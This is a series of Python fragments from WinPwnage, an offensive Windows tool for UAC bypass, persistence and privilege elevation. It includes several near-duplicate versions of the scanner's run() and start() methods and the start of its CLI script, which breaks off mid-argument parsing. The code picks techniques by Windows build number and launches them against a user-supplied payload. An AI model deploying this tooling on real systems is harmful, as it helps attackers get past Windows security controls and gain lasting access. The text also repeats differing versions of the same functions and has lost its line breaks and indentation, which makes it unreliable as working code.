def run(self, id, payload, **kwargs): print_info("Attempting to run id ({}) configured with payload ({})".format(id, payload)) for i in functions: #if i == 'uac' and not self.uac or i == 'persist' and not self.persist or i == 'elevate' and not self.elevate: if i == 'uac' and not self.uac or i == 'persist' and not self.persist or i == 'elevate' and not self.elevate or i == 'execute' and not self.execute: continue for info in functions[i]: if id in str(info["Id"]): if int(info["Works From"]) <= int(information().build_number()) < int(info["Fixed In"]): f = globals()[info["Function Name"]] # if name is not needed in function, just keep goin if 'name' not in f.__code__.co_varnames and 'add' in f.__code__.co_varnames: f(payload, add=kwargs.get('add', True)) # if name is needed for the function to run, just add a dummy # this is mainly to support pupy intergration, wich needs custom # names in order to work. elif 'name' in f.__code__.co_varnames and 'add' in f.__code__.co_varnames: f(payload, name=kwargs.get('name', 'WinPwnage'), add=kwargs.get('add', True)) # if function only needs payload as argument, eg. uac functions else: f(payload) else: print_error('Technique not compatible with this system.') return Constant.output else: pass
def run(self, id, payload, **kwargs): print_info( "Attempting to run method ({id}) configured with payload ({payload})" .format(id=id, payload=payload)) for i in functions: if i == "uac" and not self.uac or i == "persist" and not self.persist or i == "elevate" and not self.elevate: continue for info in functions[i]: if id in str(info["Id"]): if int(info["Works From"]) <= int( information().build_number()) < int( info["Fixed In"]): f = globals()[info["Function Name"]] if "name" not in f.__code__.co_varnames and "add" in f.__code__.co_varnames: f(payload, add=kwargs.get("add", True)) elif "name" in f.__code__.co_varnames and "add" in f.__code__.co_varnames: f(payload, name=kwargs.get("name", "WinPwnage"), add=kwargs.get("add", True)) else: f(payload) else: print_error( "Technique not compatible with this system.") return Constant.output else: pass
def start(self): print_info( "Comparing build number ({}) against 'Fixed In' build numbers, false positives might happen." .format(information().build_number())) print_table() fmt = "\t{Type}\t{Function Payload}\t\t{Admin}\t\t{Description}" for i in functions: if i == 'uac' and not self.uac or i == 'persist' and not self.persist or i == 'elevate' and not self.elevate or i == 'execute' and not self.execute: continue for info in functions[i]: if int(info["Works From"]) <= int( information().build_number()) < int(info["Fixed In"]): table_success(info["Id"], fmt.format(**info)) else: table_error(info["Id"], fmt.format(**info)) return Constant.output
def start(self): print_info( "Comparing build number ({buildnumber}) against 'Fixed In' build numbers" .format(buildnumber=information().build_number())) print_table() for i in functions: if i == "uac" and not self.uac or i == "persist" and not self.persist or i == "elevate" and not self.elevate: continue for info in functions[i]: if int(info["Works From"]) <= int( information().build_number()) < int(info["Fixed In"]): table_success(id=info["Id"], type=info["Type"], description=info["Description"]) else: table_error(id=info["Id"], type=info["Type"], description=info["Description"]) return Constant.output
def start(self): print_info( "Comparing build number ({}) against 'Fixed In' build numbers, false positives might happen." .format(information().build_number())) print_table() for i in functions: if i == 'uac' and not self.uac or i == 'persist' and not self.persist: continue for info in functions[i]: if int(info["Works From"]) <= int( information().build_number()) < int(info["Fixed In"]): table_success( info["Id"], "\t{}\t{}\t\t{}\t\t{}".format( str(info["Type"]), str(info["Function Payload"]), str(info["Admin"]), str(info["Description"]))) else: table_error( info["Id"], "\t{}\t{}\t\t{}\t\t{}".format( str(info["Type"]), str(info["Function Payload"]), str(info["Admin"]), str(info["Description"]))) return Constant.output
def run(self, id, payload, **kwargs): print_info("Attempting to run id ({}) configured with payload ({})".format(id, payload)) for i in functions: if i == 'uac' and not self.uac or i == 'persist' and not self.persist: continue for info in functions[i]: if id in str(info["Id"]): if int(info["Works From"]) <= int(information().build_number()) < int(info["Fixed In"]): f = globals()[info["Function Name"]] if 'name' in f.__code__.co_varnames and 'add' in f.__code__.co_varnames: f(payload, name=kwargs.get('name', ''), add=kwargs.get('add', True)) else: f(payload) else: print_error('Technique not compatible with this system.') return Constant.output else: pass
def run(self, id, payload): print_info( "Attempting to run id ({}) configured with payload ({})".format( id, payload)) for i in functions: if i == 'uac' and not self.uac or i == 'persist' and not self.persist: continue for info in functions[i]: if id in str(info["Id"]): if int(info["Works From"]) <= int( information().build_number()) < int( info["Fixed In"]): globals()[info["Function Name"]](os.path.join(payload)) else: print_error( 'Technique not compatible with this system.') return Constant.output else: pass return False
from __future__ import print_function import sys from winpwnage.core.prints import print_info from winpwnage.core.scanner import scanner, function from winpwnage.core.utils import information print(""" _ _ _ _|_|___ ___ _ _ _ ___ ___ ___ ___ | | | | | | . | | | | | .'| . | -_| |_____|_|_|_| _|_____|_|_|__,|_ |___| |_| |___| """) print_info("UAC level: {}".format(information().uac_level())) print_info("Build number: {}".format(information().build_number())) print_info("Running elevated: {}\n".format(information().admin())) def main(): # # Scanner # if sys.argv[1].lower() == "-scan": if sys.argv[2].lower() == "-uac": scanner(uac=True, persist=False, elevate=False, execute=False).start() elif sys.argv[2].lower() == "-persist": scanner(uac=False, persist=True, elevate=False, execute=False).start() elif sys.argv[2].lower() == "-elevate":